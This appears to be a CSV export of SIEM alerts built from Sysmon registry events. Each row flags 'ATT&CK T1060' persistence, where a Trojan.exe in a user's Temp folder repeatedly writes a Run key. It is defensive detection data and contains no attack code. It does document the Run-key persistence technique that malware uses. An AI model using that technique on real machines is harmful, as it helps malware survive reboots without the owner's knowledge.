HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:09.658052300Z"",""eventRecordID"":""1284"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:09.637\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:09.637"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:21.812",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:08.575 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:08.581124200Z"",""eventRecordID"":""1283"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:08.575\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:08.575"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:20.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:07.560 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:07.561760100Z"",""eventRecordID"":""1282"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:07.560\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:07.560"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:19.670",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:06.543 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:06.560331500Z"",""eventRecordID"":""1280"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:06.543\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:06.543"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:18.669",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:05.541 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:05.552989500Z"",""eventRecordID"":""1279"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:05.541\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:05.541"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:17.685",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:04.493 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:04.501240100Z"",""eventRecordID"":""1278"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:04.493\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:04.493"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:16.541",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:03.200 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:03.203454900Z"",""eventRecordID"":""1277"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:03.200\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:03.200"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:15.310",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:02.185 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:02.200336000Z"",""eventRecordID"":""1276"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:02.185\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:02.185"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:14.310",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:01.174 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:01.175922700Z"",""eventRecordID"":""1275"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:01.174\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:01.174"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:13.266",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:23:00.153 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:23:00.161870900Z"",""eventRecordID"":""1274"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:23:00.153\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:23:00.153"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:12.279",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:59.141 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:59.149574500Z"",""eventRecordID"":""1272"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:59.141\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:59.141"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:20:11.299",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:58.134 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 